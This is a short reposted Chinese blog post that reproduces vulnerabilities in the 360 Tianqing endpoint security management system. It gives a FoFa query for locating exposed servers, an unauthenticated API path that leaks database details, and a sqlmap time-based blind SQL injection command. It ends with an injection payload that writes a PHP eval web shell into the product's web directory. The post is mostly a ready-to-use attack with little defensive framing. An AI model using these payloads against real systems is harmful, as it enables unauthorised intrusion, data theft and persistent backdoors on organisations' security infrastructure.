360天擎sql注入

admin 2024年2月9日01:32:31评论17 views字数 709阅读2分21秒阅读模式

360 天擎终端安全管理系统是奇虎 360 面向政府、军队、金融、制造业、医疗、教育等大型企事业单位推出的以安全防御为核心、以运维管控为重点、以可视化管理为支撑、以可靠服务为保障的全方位终端安全解决方案。为用户构建能够有效抵御已知病毒、0day 漏洞、未知恶意代码和 APT 攻击的新一代终端安全防御体系。
360 天擎系统存在SQL注入,攻击者可以通过漏洞上传木马;同时存在未授权越权访问,造成敏感信息泄露。
FoFa搜索
title=“360新天擎”

360天擎sql注入

漏洞复现

360天擎sql注入

未授权访问漏洞泄露敏感信息,路径/api/dbstat/gettablessize,可直接访问获取数据库相关信息:
前台SQL注入,路径/api/dp/rptsvcsyncpoint?ccid=1,如下:

360天擎sql注入

存在时间盲注:

python sqlmap.py -u "http://xx.xx.xx.xx/api/dp/rptsvcsyncpoint?ccid=1%27%20AND%208443=(SELECT%208443%20FROM%20PG_SLEEP(5))%20AND%20%27%20cYyM%27=%27cYyM" --dbs --random-agent

360天擎sql注入

360天擎sql注入

可利用 SQL 注入写入 Shell:

/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:Program Files (x86)360skylar6www1.php';drop table O;-- 

原文始发于微信公众号(丁永博的成长日记):360天擎sql注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月9日01:32:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   360天擎sql注入https://cn-sec.com/archives/2212449.html

发表评论

匿名网友 填写信息